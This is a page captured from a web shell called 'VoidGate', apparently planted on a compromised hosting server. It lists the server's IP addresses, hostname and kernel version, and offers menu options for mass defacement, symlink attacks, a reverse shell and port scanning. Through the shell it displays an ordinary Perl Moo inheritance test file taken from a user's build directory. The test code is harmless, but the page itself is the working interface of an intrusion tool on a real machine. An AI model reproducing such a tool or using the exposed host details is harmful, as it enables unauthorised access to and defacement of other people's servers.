ヤミRoot VoidGate
User / IP
:
216.73.216.2
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
.cpanm
/
work
/
1568630680.21759
/
Moo-2.003004
/
t
/
Viewing: moo-c3.t
use Moo::_strictures; use Test::More; { package MyClassRoot; use Moo; has root => (is => 'ro'); } { package MyClassLeft; use Moo; extends 'MyClassRoot'; has left => (is => 'ro'); } { package MyClassRight; use Moo; extends 'MyClassRoot'; has right => (is => 'ro'); } { package MyClassChild; use Moo; extends 'MyClassLeft', 'MyClassRight'; has child => (is => 'ro'); } my $o = MyClassChild->new(root => 1, left => 2, right => 3, child => 4); is $o->root, 1, 'constructor populates root class attribute'; is $o->left, 2, 'constructor populates left parent attribute'; is $o->right, undef, 'constructor doesn\'t populate right parent attribute'; is $o->child, 4, 'constructor populates child class attribute'; done_testing;
Coded With 💗 by
0x6ick